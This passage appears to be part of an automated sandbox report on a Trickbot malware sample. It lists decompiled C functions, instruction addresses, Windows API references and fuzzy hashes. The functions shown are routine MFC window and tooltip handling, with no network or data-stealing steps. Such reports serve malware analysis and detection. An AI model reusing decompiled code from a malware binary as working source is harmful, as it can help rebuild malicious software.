									 *(_t215 - 0x50) = 1;
									_t126 = SendMessageA( *(_t169 + 0x1c), 0x408, 0, _t215 - 0x54);
									__eflags = _t126;
									if(_t126 == 0) {
										SendMessageA( *(_t169 + 0x1c), 0x404, 0, _t215 - 0x54);
									}
									_t127 =  *((intOrPtr*)(_t215 + 8));
									 *((intOrPtr*)(_t215 - 0x24)) =  *((intOrPtr*)(_t127 + 0x18));
									 *(_t215 - 0x28) =  *(_t127 + 0x14);
									ScreenToClient( *(_t198 + 0x1c), _t215 - 0x28);
									E00405360(_t215 - 0x80, 0, 0x2c);
									_t221 = _t220 + 0xc;
									 *(_t215 - 0x80) = 0x28;
									_t116 =  *((intOrPtr*)( *_t198 + 0x64))( *(_t215 - 0x28),  *((intOrPtr*)(_t215 - 0x24)), _t215 - 0x80);
									 *(_t215 - 0x1c) = _t116;
									asm("sbb ecx, ecx");
									_t182 =  ~(_t116 + 1) & _t198;
									__eflags =  *(_t211 + 0xd4) - _t116;
									 *(_t215 - 0x14) = _t182;
									if( *(_t211 + 0xd4) != _t116) {
										L33:
										__eflags = _t116 - 0xffffffff;
										if(_t116 == 0xffffffff) {
											SendMessageA( *(_t169 + 0x1c), 0x401, 0, 0);
											L42:
											E00416390(_t169,  *((intOrPtr*)(_t215 + 8)));
											__eflags =  *(_t211 + 0xd8) - 0x28;
											_t91 = _t211 + 0xd8; // 0xd8
											_t200 = _t91;
											if( *(_t211 + 0xd8) >= 0x28) {
												SendMessageA( *(_t169 + 0x1c), 0x405, 0, _t200);
											}
											 *(_t211 + 0xd0) =  *(_t215 - 0x14);
											 *(_t211 + 0xd4) =  *(_t215 - 0x1c);
											_t183 = 0xb;
											_t116 = memcpy(_t200, _t215 - 0x80, _t183 << 2);
											goto L45;
										}
										_t186 = 0xb;
										_t141 = memcpy(_t215 - 0x54, _t215 - 0x80, _t186 << 2);
										_t221 = _t221 + 0xc;
										_t188 =  *(_t215 - 0x10);
										 *(_t215 - 0x50) = _t141;
										__eflags =  *(_t188 + 0x24) & 0x00000400;
										if(( *(_t188 + 0x24) & 0x00000400) != 0) {
											_t150 = _t141 | 0x00000020;
											__eflags = _t150;
											 *(_t215 - 0x50) = _t150;
										}
										SendMessageA( *(_t169 + 0x1c), 0x404, 0, _t215 - 0x54);
										__eflags =  *(_t215 - 0x79) & 0x00000040;
										if(( *(_t215 - 0x79) & 0x00000040) != 0) {
											L38:
											SendMessageA( *(_t169 + 0x1c), 0x401, 1, 0);
											_t145 =  *(_t215 - 0x10);
											__eflags =  *(_t145 + 0x24) & 0x00000400;
											if(( *(_t145 + 0x24) & 0x00000400) != 0) {
												SendMessageA( *(_t169 + 0x1c), 0x411, 1, _t215 - 0x54);
											}
											SetWindowPos( *(_t169 + 0x1c), 0, 0, 0, 0, 0, 0x213);
											goto L41;
										} else {
											_t149 = E00419E69( *(_t215 - 0x10));
											__eflags = _t149;
											if(_t149 == 0) {
												L41:
												_t211 =  *((intOrPtr*)(_t215 - 0x18));
												goto L42;
											}
											goto L38;
										}
									} else {
										__eflags =  *(_t211 + 0xd0) - _t182;
										if( *(_t211 + 0xd0) != _t182) {
											goto L33;
										}
										__eflags =  *(_t198 + 0x25) & 0x00000004;
										if(( *(_t198 + 0x25) & 0x00000004) == 0) {
											__eflags = _t116 - 0xffffffff;
											if(_t116 != 0xffffffff) {
												_t116 = E00416390(_t169,  *((intOrPtr*)(_t215 + 8)));
											}
										} else {
											GetCursorPos(_t215 - 0x20);
											_t116 = SendMessageA( *(_t169 + 0x1c), 0x412, 0, ( *(_t215 - 0x1c) & 0x0000ffff) << 0x00000010 |  *(_t215 - 0x20) & 0x0000ffff);
										}
										L45:
										__eflags =  *((intOrPtr*)(_t215 - 0x5c)) - 0xffffffff;
										if( *((intOrPtr*)(_t215 - 0x5c)) != 0xffffffff) {
											__eflags =  *(_t215 - 0x60);
											if( *(_t215 - 0x60) == 0) {
												_t116 = E004053B8( *((intOrPtr*)(_t215 - 0x5c)));
											}
										}
										goto L78;
									}
								} else {
									__eflags = _t169;
									if(_t169 != 0) {
										_t116 =  *((intOrPtr*)( *_t169 + 4))(1);
									}
									goto L78;
								}
							}
							_t160 = E004043F9(_t169);
							__eflags = _t160 -  *(_t215 - 0x14);
							if(_t160 !=  *(_t215 - 0x14)) {
								 *((intOrPtr*)( *_t169 + 0x58))();
								 *((intOrPtr*)( *_t169 + 4))(1);
								_t169 = 0;
								__eflags = 0;
								 *(_t211 + 0xcc) = 0;
							}
							__eflags = _t169;
							if(_t169 != 0) {
								goto L25;
							} else {
								goto L19;
							}
						} else {
							__eflags = _t116;
							if(_t116 == 0) {
								_t116 = E00432D4E(0x44b2ec, E00430506);
								 *(_t116 + 0xd0) =  *(_t116 + 0xd0) & 0x00000000;
								 *(_t116 + 0xd4) =  *(_t116 + 0xd4) | 0xffffffff;
							}
							goto L78;
						}
					}
				} else {
					L50:
					__eflags =  *(_t198 + 0x24) & 0x00000401;
					if(( *(_t198 + 0x24) & 0x00000401) == 0) {
						L78:
						 *[fs:0x0] =  *((intOrPtr*)(_t215 - 0xc));
						return _t116;
					}
					_push( *_t167);
					while(1) {
						_t116 = E0041884D(_t215);
						__eflags = _t116;
						if(_t116 == 0) {
							break;
						}
						__eflags = _t116 - _t198;
						if(_t116 == _t198) {
							L57:
							__eflags = _t208 - 0x100;
							if(_t208 < 0x100) {
								L59:
								__eflags = _t208 - 0x104;
								if(_t208 < 0x104) {
									L62:
									_t116 = 0;
									__eflags = 0;
									L63:
									__eflags =  *(_t198 + 0x25) & 0x00000004;
									if(( *(_t198 + 0x25) & 0x00000004) != 0) {
										goto L78;
									}
									__eflags = _t116;
									if(_t116 != 0) {
										L77:
										_t116 = E00419134(_t116);
										goto L78;
									}
									__eflags = _t208 - 0x201;
									if(_t208 == 0x201) {
										goto L77;
									}
									__eflags = _t208 - 0x203;
									if(_t208 == 0x203) {
										goto L77;
									}
									__eflags = _t208 - 0x204;
									if(_t208 == 0x204) {
										goto L77;
									}
									__eflags = _t208 - 0x206;
									if(_t208 == 0x206) {
										goto L77;
									}
									__eflags = _t208 - 0x207;
									if(_t208 == 0x207) {
										goto L77;
									}
									__eflags = _t208 - 0x209;
									if(_t208 == 0x209) {
										goto L77;
									}
									__eflags = _t208 - 0xa1;
									if(_t208 == 0xa1) {
										goto L77;
									}
									__eflags = _t208 - 0xa3;
									if(_t208 == 0xa3) {
										goto L77;
									}
									__eflags = _t208 - 0xa4;
									if(_t208 == 0xa4) {
										goto L77;
									}
									__eflags = _t208 - 0xa6;
									if(_t208 == 0xa6) {
										goto L77;
									}
									__eflags = _t208 - 0xa7;
									if(_t208 == 0xa7) {
										goto L77;
									}
									__eflags = _t208 - 0xa9;
									if(_t208 != 0xa9) {
										goto L78;
									}
									goto L77;
								}
								__eflags = _t208 - 0x107;
								if(_t208 > 0x107) {
									goto L62;
								}
								L61:
								_t116 = 1;
								goto L63;
							}
							__eflags = _t208 - 0x108;
							if(_t208 <= 0x108) {
								goto L61;
							}
							goto L59;
						}
						__eflags =  *(_t116 + 0x24) & 0x00000401;
						if(( *(_t116 + 0x24) & 0x00000401) != 0) {
							break;
						}
						_push(GetParent( *(_t116 + 0x1c)));
					}
					__eflags = _t116 - _t198;
					if(_t116 != _t198) {
						goto L78;
					}
					goto L57;
				}
			}

0x00416427
0x0041642c
0x00416430
0x00416435
0x00416438
0x00416440
0x00416443
0x00416446
0x00416474
0x00416479
0x004167ac
0x004167ac
0x00000000
0x004167ac
0x00416481
0x00416486
0x00000000
0x00000000
0x0041648e
0x00416493
0x00000000
0x00416499
0x00416499
0x0041649b
0x0041649b
0x004164a2
0x004164b5
0x00000000
0x004164b5
0x004164b8
0x004164ba
0x004164f5
0x004164f9
0x004164fc
0x00416502
0x00416507
0x00416509
0x0041650c
0x00416536
0x00416538
0x0041653e
0x00416541
0x00416543
0x00416545
0x00416548
0x00416551
0x00416551
0x00416553
0x00416557
0x0041655e
0x00416563
0x00416565
0x00416589
0x0041658f
0x00416592
0x00416598
0x004165a0
0x004165a5
0x004165a8
0x004165ab
0x004165ae
0x004165b4
0x004165c3
0x004165cd
0x004165d3
0x004165d5
0x004165e5
0x004165e5
0x004165eb
0x004165f4
0x004165fb
0x00416601
0x0041660f
0x00416614
0x0041661c
0x0041662c
0x00416631
0x00416637
0x00416639
0x0041663b
0x00416641
0x00416644
0x00416698
0x00416698
0x0041669b
0x004167a4
0x00416733
0x00416737
0x0041673c
0x00416743
0x00416743
0x00416749
0x00416756
0x00416756
0x00416761
0x0041676a
0x00416770
0x00416774
0x00000000
0x00416774
0x004166a6
0x004166b2
0x004166b2
0x004166b4
0x004166bc
0x004166bf
0x004166c2
0x004166c4
0x004166c4
0x004166c6
0x004166c6
0x004166d8
0x004166de
0x004166e2
0x004166f0
0x004166fb
0x00416701
0x00416704
0x00416707
0x00416717
0x00416717
0x0041672a
0x00000000
0x004166e4
0x004166e7
0x004166ec
0x004166ee
0x00416730
0x00416730
0x00000000
0x00416730
0x00000000
0x004166ee
0x00416646
0x00416646
0x0041664c
0x00000000
0x00000000
0x0041664e
0x00416652
0x00416681
0x00416684
0x0041668e
0x0041668e
0x00416654
0x00416658
0x00416676
0x00416676
0x00416776
0x00416776
0x0041677a
0x00416780
0x00416784
0x0041678d
0x00416792
0x00416784
0x00000000
0x0041677a
0x00416567
0x00416567
0x00416569
0x00416575
0x00416575
0x00000000
0x00416569
0x00416565
0x00416510
0x00416515
0x00416518
0x0041651e
0x00416527
0x0041652a
0x0041652a
0x0041652c
0x0041652c
0x00416532
0x00416534
0x00000000
0x00000000
0x00000000
0x00000000
0x004164bc
0x004164bc
0x004164be
0x004164ce
0x004164d3
0x004164da
0x004164da
0x00000000
0x004164be
0x004164ba
0x004167af
0x004167af
0x004167af
0x004167b5
0x0041687d
0x00416883
0x0041688b
0x0041688b
0x004167bb
0x004167bd
0x004167bd
0x004167c2
0x004167c4
0x00000000
0x00000000
0x004167c6
0x004167c8
0x004167e6
0x004167e6
0x004167ec
0x004167f6
0x004167f6
0x004167fc
0x0041680b
0x0041680b
0x0041680b
0x0041680d
0x0041680d
0x00416811
0x00000000
0x00000000
0x00416813
0x00416815
0x00416877
0x00416878
0x00000000
0x00416878
0x00416817
0x0041681d
0x00000000
0x00000000
0x0041681f
0x00416825
0x00000000
0x00000000
0x00416827
0x0041682d
0x00000000
0x00000000
0x0041682f
0x00416835
0x00000000
0x00000000
0x00416837
0x0041683d
0x00000000
0x00000000
0x0041683f
0x00416845
0x00000000
0x00000000
0x00416847
0x0041684d
0x00000000
0x00000000
0x0041684f
0x00416855
0x00000000
0x00000000
0x00416857
0x0041685d
0x00000000
0x00000000
0x0041685f
0x00416865
0x00000000
0x00000000
0x00416867
0x0041686d
0x00000000
0x00000000
0x0041686f
0x00416875
0x00000000
0x00000000
0x00000000
0x00416875
0x004167fe
0x00416804
0x00000000
0x00000000
0x00416806
0x00416808
0x00000000
0x00416808
0x004167ee
0x004167f4
0x00000000
0x00000000
0x00000000
0x004167f4
0x004167ca
0x004167d0
0x00000000
0x00000000
0x004167db
0x004167db
0x004167de
0x004167e0
0x00000000
0x00000000
0x00000000
0x004167e0

APIs

__EH_prolog.LIBCMT ref: 00416427
GetKeyState.USER32(00000001), ref: 00416474
GetKeyState.USER32(00000002), ref: 00416481
GetKeyState.USER32(00000004), ref: 0041648E
GetParent.USER32(?), ref: 004164AF
SendMessageA.USER32(?,00000401,00000000,00000000), ref: 00416589
SendMessageA.USER32(?,00000408,00000000,?), ref: 004165CD
SendMessageA.USER32(?,00000404,00000000,00000028), ref: 004165E5
ScreenToClient.USER32(?,?), ref: 00416601
GetCursorPos.USER32(?), ref: 00416658
SendMessageA.USER32(?,00000412,00000000,?), ref: 00416676
SendMessageA.USER32(?,00000404,00000000,00000028), ref: 004166D8
SendMessageA.USER32(?,00000401,00000001,00000000), ref: 004166FB
SendMessageA.USER32(?,00000411,00000001,00000028), ref: 00416717
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 0041672A
SendMessageA.USER32(?,00000405,00000000,000000D8), ref: 00416756
SendMessageA.USER32(?,00000401,00000000,00000000), ref: 004167A4
GetParent.USER32(?), ref: 004167D5

Strings

(, xrefs: 004165B4
(, xrefs: 0041661C
@, xrefs: 004166DE

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: MessageSend$State$Parent$ClientCursorH_prologScreenWindow
String ID: ($($@
API String ID: 986702660-2846432479
Opcode ID: c4a27ce0fc41503571ae3ff46547edff6463ef07b9ffd30af0fb7e24fae11fc2
Instruction ID: 683a017a1f253c99901c234bf21f6818f886763115cf72a948bc0ad45a94e06b
Opcode Fuzzy Hash: c4a27ce0fc41503571ae3ff46547edff6463ef07b9ffd30af0fb7e24fae11fc2
Instruction Fuzzy Hash: B4C18271A00314ABDF24AFA5CD85BEE77B5AB04304F12413BE915B62D1D778DC81CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00412CA0, Relevance: 30.2, APIs: 20, Instructions: 246
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00412CA0(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagPAINTSTRUCT _v64;
				long _v72;
				signed int _v76;
				signed int _t34;
				int _t69;
				struct HWND__* _t71;
				signed int _t73;

				_t69 = _a8;
				_t82 = _t69 - 0x82;
				if(_t69 != 0x82) {
					_t71 = _a4;
					__eflags = GetPropA(_t71, 0);
					if(__eflags == 0) {
						__eflags = _t69 - 0xf1;
						_t34 = _t69;
						if(__eflags > 0) {
							__eflags = _t34 - 0xf3;
							if(_t34 == 0xf3) {
								goto L28;
							} else {
								__eflags = _t34 - 0x1943;
								if(__eflags < 0) {
									goto L11;
								} else {
									__eflags = _t34 - 0x1944;
									if(__eflags <= 0) {
										 *_a16 = 1;
										return 0x3e8;
									} else {
										goto L11;
									}
								}
							}
						} else {
							if(__eflags == 0) {
								L28:
								_t73 = 4;
								goto L29;
							} else {
								_t34 = _t34 - 7;
								__eflags = _t34 - 8;
								if(__eflags > 0) {
									L11:
									return CallWindowProcA(E00410610(__eflags, _t71, 0), _t71, _t69, _a12, _a16);
								} else {
									switch( *((intOrPtr*)(_t34 * 4 +  &M00412F50))) {
										case 0:
											__ebp = 0x16;
											goto L29;
										case 1:
											__eax = GetWindowLongA(__esi, 0xfffffff0);
											__al = __al & 0x0000001f;
											__eflags = __al - 9;
											if(__al == 9) {
												__eax = SendMessageA(__esi, 0xf3, 0, 0);
											}
											__ebp = 0;
											goto L29;
										case 2:
											goto L11;
										case 3:
											__ebp = 6;
											goto L29;
										case 4:
											__eax = GetWindowLongA(__esi, 0xfffffff0);
											__eflags = __eax & 0x10000000;
											if((__eax & 0x10000000) == 0) {
												L20:
												__ebp = 0x16;
											} else {
												__al = __al & 0x0000001f;
												__eflags = __al - 7;
												if(__al != 7) {
													goto L20;
												} else {
													__ebp = 0x22;
												}
											}
											L29:
											_v72 = SendMessageA(_t71, 0xf2, 0, 0);
											_t36 = GetWindowLongA(_t71, 0xfffffff0);
											__eflags = _t36 & 0x10000000;
											if(__eflags == 0) {
												goto L11;
											} else {
												__eflags = _t69 - 7;
												if(__eflags != 0) {
													_t52 = _t36 & 0xefffffff;
													__eflags = _t52;
													SetWindowLongA(_t71, 0xfffffff0, _t52);
												}
												_v72 = CallWindowProcA(E00410610(__eflags, _t71, 0), _t71, _t69, _a12, _a16);
												__eflags = _t69 - 7;
												if(_t69 != 7) {
													_t50 = GetWindowLongA(_t71, 0xfffffff0) | 0x10000000;
													__eflags = _t50;
													SetWindowLongA(_t71, 0xfffffff0, _t50);
												}
												_t63 = SendMessageA(_t71, 0xf2, 0, 0);
												__eflags = _t69 - 0xf3;
												if(_t69 == 0xf3) {
													L36:
													__eflags = _t63 - _v76;
													if(_t63 != _v76) {
														goto L37;
													}
												} else {
													__eflags = _t69 - 0xf1;
													if(_t69 != 0xf1) {
														L37:
														_t70 = GetDC(_t71);
														__eflags = _t70;
														if(_t70 != 0) {
															_t64 = _t63 ^ _v76;
															__eflags = _t64 & 0x00000003;
															if((_t64 & 0x00000003) != 0) {
																_t73 = _t73 | 0x00000004;
																__eflags = _t73;
															}
															_t66 = _t64 & 0x00000008 | _t73;
															__eflags = _t66;
															ExcludeUpdateRgn(_t70, _t71);
															_push(_t66);
															E00412750(_t71, _t70);
															ReleaseDC(_t71, _t70);
														}
													} else {
														goto L36;
													}
												}
												return _v72;
											}
											goto L43;
										case 5:
											__edi = SendMessageA(__esi, 0xf2, 0, 0);
											__ebx = _a12;
											__ebp = __ebx;
											__eflags = __ebp;
											if(__ebp == 0) {
												__eax =  &_v64;
												__ebp = BeginPaint;
												__ebp = BeginPaint(__esi,  &_v64);
											}
											__eax = GetWindowLongA(__esi, 0xfffffff0);
											__eflags = __eax & 0x10000000;
											if((__eax & 0x10000000) != 0) {
												__edi = __edi & 0x00000008;
												__edi = __edi | 0x00000006;
												__eflags = __edi;
												_push(__edi);
												__eax = E00412750(__esi, __ebp);
											}
											__eflags = __ebx;
											if(__ebx == 0) {
												 &_v64 = EndPaint(__esi,  &_v64);
											}
											__eax = 0;
											__eflags = 0;
											return 0;
											goto L43;
									}
								}
							}
						}
					} else {
						return CallWindowProcA(E00410610(__eflags, _t71, 0), _t71, _t69, _a12, _a16);
					}
				} else {
					return E00410840(_t82, _a4, _t69, _a12, _a16, 0);
				}
				L43:
			}

0x00412ca7
0x00412cab
0x00412cb1
0x00412cd9
0x00412ceb
0x00412ced
0x00412d19
0x00412d1f
0x00412d21
0x00412d38
0x00412d3d
0x00000000
0x00412d43
0x00412d43
0x00412d48
0x00000000
0x00412d4a
0x00412d4a
0x00412d4f
0x00412f3d
0x00412f4b
0x00000000
0x00000000
0x00000000
0x00412d4f
0x00412d48
0x00412d23
0x00412d23
0x00412e46
0x00412e46
0x00000000
0x00412d29
0x00412d29
0x00412d2c
0x00412d2f
0x00412d55
0x00412d7c
0x00412d31
0x00412d31
0x00000000
0x00412d7f
0x00000000
0x00000000
0x00412d8c
0x00412d92
0x00412d94
0x00412d96
0x00412da2
0x00412da2
0x00412da8
0x00000000
0x00000000
0x00000000
0x00000000
0x00412daf
0x00000000
0x00000000
0x00412dbc
0x00412dc2
0x00412dc7
0x00412dd6
0x00412dd6
0x00412dc9
0x00412dc9
0x00412dcb
0x00412dcd
0x00000000
0x00412dcf
0x00412dcf
0x00412dcf
0x00412dcd
0x00412e4b
0x00412e5b
0x00412e62
0x00412e68
0x00412e6d
0x00000000
0x00412e73
0x00412e73
0x00412e76
0x00412e78
0x00412e78
0x00412e81
0x00412e81
0x00412ea5
0x00412ea9
0x00412eac
0x00412eb7
0x00412eb7
0x00412ec0
0x00412ec0
0x00412ed6
0x00412ed8
0x00412ede
0x00412ee8
0x00412ee8
0x00412eec
0x00000000
0x00000000
0x00412ee0
0x00412ee0
0x00412ee6
0x00412eee
0x00412ef5
0x00412ef7
0x00412ef9
0x00412efb
0x00412eff
0x00412f02
0x00412f04
0x00412f04
0x00412f04
0x00412f0c
0x00412f0c
0x00412f0e
0x00412f14
0x00412f17
0x00412f21
0x00412f21
0x00000000
0x00000000
0x00000000
0x00412ee6
0x00412f32
0x00412f32
0x00000000
0x00000000
0x00412ded
0x00412def
0x00412df3
0x00412df5
0x00412df7
0x00412df9
0x00412dfd
0x00412e07
0x00412e07
0x00412e0c
0x00412e12
0x00412e17
0x00412e19
0x00412e1c
0x00412e1c
0x00412e1f
0x00412e22
0x00412e27
0x00412e2a
0x00412e2c
0x00412e34
0x00412e34
0x00412e3a
0x00412e3a
0x00412e43
0x00000000
0x00000000
0x00412d31
0x00412d2f
0x00412d23
0x00412cef
0x00412d16
0x00412d16
0x00412cb3
0x00412cd4
0x00412cd4
0x00000000

APIs

GetPropA.USER32(?,00000000), ref: 00412CE5
CallWindowProcA.USER32(00000000), ref: 00412D0D

Part of subcall function 00410840: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 00410866
Part of subcall function 00410840: RemovePropA.USER32(?,00000000), ref: 0041087E
Part of subcall function 00410840: RemovePropA.USER32(?,00000000), ref: 0041088A

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Prop$CallProcRemoveWindow
String ID:
API String ID: 2276450057-0
Opcode ID: b6a9b017ea78a4852f055930b32688fa3609341f6cba679b96f812213a9223c1
Instruction ID: db619e21cc1ccbdb72307f1674bd17e4a1efd94b9e177812b332f8afb0fc7592
Opcode Fuzzy Hash: b6a9b017ea78a4852f055930b32688fa3609341f6cba679b96f812213a9223c1
Instruction Fuzzy Hash: 326145726443147FD621AB14ED48FEF3768EB86321F100526FA00C23D1DBE89D9686BE

Uniqueness

Uniqueness Score: -1.00%

Function 00418B0A, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 170
stringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00418B0A(void* __edx, void* _a4, int _a8, long _a12) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				void* __ebp;
				intOrPtr _t50;
				signed int _t52;
				long _t53;
				long _t62;
				long _t70;
				char _t71;
				long _t73;
				CHAR* _t76;
				int _t83;
				signed char _t92;
				void* _t93;
				void* _t95;
				long _t96;
				intOrPtr _t99;
				intOrPtr* _t101;
				intOrPtr _t102;
				CHAR* _t104;
				long _t105;

				_t93 = __edx;
				_t50 = E00432D4E(0x44b2ec, E00430506);
				_v8 = _t50;
				if(_a4 != 3) {
					return CallNextHookEx( *(_t50 + 0x2c), _a4, _a8, _a12);
				}
				_t101 =  *((intOrPtr*)(_t50 + 0x14));
				_t95 =  *_a12;
				_t52 =  *(E00432562() + 0x14) & 0x000000ff;
				_t83 = _a8;
				_v12 = _t52;
				if(_t101 != 0 || ( *(_t95 + 0x23) & 0x00000040) == 0 && _t52 == 0) {
					if( *0x44b4dc == 0) {
						L10:
						if(_t101 == 0) {
							_t53 = GetWindowLongA(_t83, 0xfffffffc);
							_a4 = _t53;
							if(_t53 != 0) {
								_t104 = "AfxOldWndProc423";
								if(GetPropA(_t83, _t104) == 0) {
									SetPropA(_t83, _t104, _a4);
									if(GetPropA(_t83, _t104) == _a4) {
										GlobalAddAtomA(_t104);
										_t62 = E00418A8E;
										if( *((intOrPtr*)(_v8 + 0x28)) == 0) {
											_t62 = E0041892F;
										}
										SetWindowLongA(_t83, 0xfffffffc, _t62);
									}
								}
							}
							goto L27;
						}
						E00418892(_t101, _t83);
						 *((intOrPtr*)( *_t101 + 0x50))();
						_a8 =  *((intOrPtr*)( *_t101 + 0x80))();
						if( *0x44b354 != 0 || _v12 != 0) {
							L18:
							_t105 = E00418929();
							_t70 = SetWindowLongA(_t83, 0xfffffffc, _t105);
							if(_t70 == _t105) {
								goto L20;
							}
							goto L19;
						} else {
							_t99 =  *0x44b4d8; // 0x1cd370
							if(_t99 == 0 ||  *((intOrPtr*)(_t99 + 0x20)) == 0) {
								goto L18;
							} else {
								_push(0);
								_push(0);
								_push(0x36f);
								_push(_t83);
								_push(_t101);
								_t71 = E0041868C(_t93);
								_v20 = _t71;
								if(_t71 == 0) {
									goto L18;
								}
								_a4 = E00418929();
								_t73 = GetWindowLongA(_t83, 0xfffffffc);
								asm("sbb esi, esi");
								 *((intOrPtr*)(_t99 + 0x20))(_t83, _v20);
								if( ~(_t73 - _a4) + 1 != 0) {
									L20:
									_t102 = _v8;
									 *(_t102 + 0x14) =  *(_t102 + 0x14) & 0x00000000;
									goto L28;
								}
								_t70 = SetWindowLongA(_t83, 0xfffffffc, _a4);
								L19:
								 *_a8 = _t70;
								goto L20;
							}
						}
					}
					if((GetClassLongA(_t83, 0xffffffe6) & 0x00010000) != 0) {
						goto L27;
					}
					_t76 =  *(_t95 + 0x28);
					_t92 = _t76 >> 0x10;
					if(_t92 == 0) {
						_v20 = _v20 & _t92;
						GlobalGetAtomNameA( *(_t95 + 0x28),  &_v20, 5);
						_t76 =  &_v20;
					}
					if(lstrcmpiA(_t76, ?str?) == 0) {
						goto L27;
					} else {
						goto L10;
					}
				} else {
					L27:
					_t102 = _v8;
					L28:
					_t96 = CallNextHookEx( *(_t102 + 0x2c), 3, _t83, _a12);
					if(_v12 != 0) {
						UnhookWindowsHookEx( *(_t102 + 0x2c));
						 *(_t102 + 0x2c) =  *(_t102 + 0x2c) & 0x00000000;
					}
					return _t96;
				}
			}

0x00418b0a
0x00418b1a
0x00418b23
0x00418b26
0x00000000
0x00418b34
0x00418b44
0x00418b48
0x00418b4f
0x00418b53
0x00418b56
0x00418b5b
0x00418b76
0x00418bc4
0x00418bc6
0x00418c78
0x00418c80
0x00418c83
0x00418c8b
0x00418c96
0x00418c9d
0x00418caa
0x00418cad
0x00418cba
0x00418cbf
0x00418cc1
0x00418cc1
0x00418cca
0x00418cca
0x00418caa
0x00418c96
0x00000000
0x00418c83
0x00418bcf
0x00418bd8
0x00418bec
0x00418bef
0x00418c52
0x00418c57
0x00418c5d
0x00418c65
0x00000000
0x00000000
0x00000000
0x00418bf7
0x00418bf7
0x00418bff
0x00000000
0x00418c07
0x00418c07
0x00418c09
0x00418c0b
0x00418c10
0x00418c11
0x00418c12
0x00418c19
0x00418c1c
0x00000000
0x00000000
0x00418c26
0x00418c29
0x00418c3a
0x00418c3d
0x00418c42
0x00418c6c
0x00418c6c
0x00418c6f
0x00000000
0x00418c6f
0x00418c4a
0x00418c67
0x00418c6a
0x00000000
0x00418c6a
0x00418bff
0x00418bef
0x00418b86
0x00000000
0x00000000
0x00418b8c
0x00418b91
0x00418b97
0x00418b99
0x00418ba7
0x00418bad
0x00418bad
0x00418bbe
0x00000000
0x00000000
0x00000000
0x00000000
0x00418cd0
0x00418cd0
0x00418cd0
0x00418cd3
0x00418ce6
0x00418ce8
0x00418ced
0x00418cf3
0x00418cf3
0x00000000
0x00418cfb

APIs

Part of subcall function 00432D4E: TlsGetValue.KERNEL32(0044B4A0,?,00000000,00432571,00430506,0043258D,0041C011,0041E91C,?,00000000,?,00413D3C,00000000,00000000,00000000,00000000), ref: 00432D8D

CallNextHookEx.USER32(?,00000003,?,?), ref: 00418B34
GetClassLongA.USER32(?,000000E6), ref: 00418B7B
GlobalGetAtomNameA.KERNEL32(?,?,00000005), ref: 00418BA7
lstrcmpiA.KERNEL32(?,ime,?,?,?,Function_00030506), ref: 00418BB6
GetWindowLongA.USER32(?,000000FC), ref: 00418C29
SetWindowLongA.USER32(?,000000FC,00000000), ref: 00418C4A

Strings

ime, xrefs: 00418BB0
AfxOldWndProc423, xrefs: 00418C8B, 00418C90, 00418C9B, 00418CA3, 00418CAC

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Long$Window$AtomCallClassGlobalHookNameNextValuelstrcmpi
String ID: AfxOldWndProc423$ime
API String ID: 3731301195-104836986
Opcode ID: 1593092a398c9522309a9bb4c80d461e69680f9ea6813642c299e1df01d6fcc1
Instruction ID: 2fbb638aa9d382519783bebb2f293646e989fb4ea4d3784b0d2e66ed29f98d3c
Opcode Fuzzy Hash: 1593092a398c9522309a9bb4c80d461e69680f9ea6813642c299e1df01d6fcc1
Instruction Fuzzy Hash: 29518C71501214BBCB119F64DC48BAB7BA9BF08361F14462AF915A6291EB78DD80CBE8

Uniqueness

Uniqueness Score: -1.00%

Function 0042C7B3, Relevance: 28.8, APIs: 19, Instructions: 266
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0042C7B3(intOrPtr* __ecx, void* __eflags) {
				void* _t146;
				void* _t150;
				void* _t159;
				void* _t165;
				intOrPtr* _t246;
				RECT* _t250;
				void* _t255;

				E00405340(E00437F30, _t255);
				_t246 = __ecx;
				E004046B6(_t255 - 0x2c);
				 *(_t255 - 0x2c) = 0x43aee4;
				 *((intOrPtr*)(_t255 - 4)) = 0;
				E004046B6(_t255 - 0x1c);
				 *(_t255 - 0x1c) = 0x43aee4;
				 *((char*)(_t255 - 4)) = 1;
				E004046B6(_t255 - 0x14);
				 *(_t255 - 0x14) = 0x43aee4;
				 *((char*)(_t255 - 4)) = 2;
				E0042179E(_t255 - 0x1c, CreateRectRgnIndirect( *(_t255 + 8)));
				CopyRect(_t255 - 0x44,  *(_t255 + 8));
